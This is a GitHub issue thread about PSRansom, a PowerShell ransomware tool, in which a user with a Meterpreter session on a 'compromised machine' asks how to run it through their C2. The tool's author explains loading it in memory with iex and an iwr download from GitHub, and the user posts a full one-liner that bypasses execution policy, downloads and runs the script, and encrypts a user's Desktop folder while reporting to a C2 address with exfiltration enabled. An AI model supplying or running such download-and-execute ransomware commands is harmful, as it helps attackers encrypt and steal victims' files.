### ISSUE TITLE
How can i run PSRansom from Meterpreter session

### ISSUE THREAD

**Issue by IAMinZoho** [JoelGMSec/PSRansom#3]
I want to run PSRansom on a compromised machine to which I have a meterpreter session already established to my C2. I wanted to use IEX to load the PSRansom from raw github page. This is not working. Please help me fix this or if there is a better alternative, please suggest.

**Comment by JoelGMSec** [comment]
Hi!

You can call any script without function (like PSRansom) doing something like this:

'function PSRansom {' + $data + '}' | iex

Where data is the raw data of the script. Or you can replace data with $(iwr -useb https://raw.github..) if you prefer.

Thanks for using PSRansom :)


Regards!

**Comment by IAMinZoho** [comment]
I am an amateur. If you can spare some time for me and share the steps on how I can run PSAttack reflectively using a meterpreter shell, then it would awesome. Thanks for sharing the PSAttack on github.

**Comment by IAMinZoho** [comment]
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/JoelGMSec/PSRansom/main/PSRansom.ps1'));.\PSRansom.ps1 -e C:\Users\Anna\Desktop\New Folder -s 192.168.219.64 -p 80 -x -Demo

**Comment by IAMinZoho** [comment]
This does not work... Please help. Of all the PowerShell based ransomware I tested PSRansome is the best.
